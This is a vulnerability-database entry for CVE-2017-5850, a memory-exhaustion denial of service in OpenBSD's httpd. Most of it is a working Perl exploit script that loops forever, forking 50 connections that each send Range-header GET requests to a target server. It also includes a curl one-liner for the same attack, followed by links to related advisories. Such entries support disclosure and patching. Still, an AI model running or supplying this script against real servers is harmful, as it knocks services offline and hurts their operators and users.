Lucene search
RootSSV:92672HistoryFeb 10, 2017 - 12:00 a.m.
OpenBSD http server - denial of service vulnerability(CVE-2017-5850)
2017-02-1000:00:00
Root
www.seebug.org
180
0.019 Low
EPSS
Percentile
88.6%
No description provided by source.
#!/usr/bin/perl -w
# curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs
use warnings;
use IO::Socket;
use Parallel::ForkManager;
$numforks = 50;
if ($#ARGV < 1)
{
&usage;
exit;
}
while (1) {
&killhttpd();
}
sub usage {
print "OpenBSD HTTP Remote Denial of Service (memory exhaustion) - @PierreKimSec\n";
print "usage: perl killobsdhttpd.pl <host> <remotefile>\n";
}
sub killhttpd {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
$pm = new Parallel::ForkManager($numforks);
for (0 .. $numforks)
{
my $pid = $pm->start and next;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');
$p = "GET $ARGV[1] HTTP/1.1\r\nRange: bytes=1-\r\nAccept: */*\r\nHost: $ARGV[0]\r\nConnection: close\r\n\r\n";
print $sock $p;
if (<$sock>) {sleep (0.5); $sock->close();}
$pm->finish;
}
$pm->wait_all_children;
}
Related
zdt
zdt
OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service Exploit
2017-02-07 00:00:00
OpenBSD 6.0 httpd Content-Length DoS Exploit
2017-02-02 00:00:00
cvelist
cvelist
CVE-2017-5850
2017-03-27 15:00:00
exploitpack
exploitpack
OpenBSD HTTPd 6.0 - Memory Exhaustion Denial of Service
2017-02-07 00:00:00
prion
prion
Design/Logic Flaw
2017-03-27 15:59:00
cve
cve
CVE-2017-5850
2017-03-27 15:59:00
nvd
nvd
CVE-2017-5850
2017-03-27 15:59:00
packetstorm
packetstorm
OpenBSD HTTP Server 6.0 Denial Of Service
2017-02-06 00:00:00
exploitdb
exploitdb
OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service
2017-02-07 00:00:00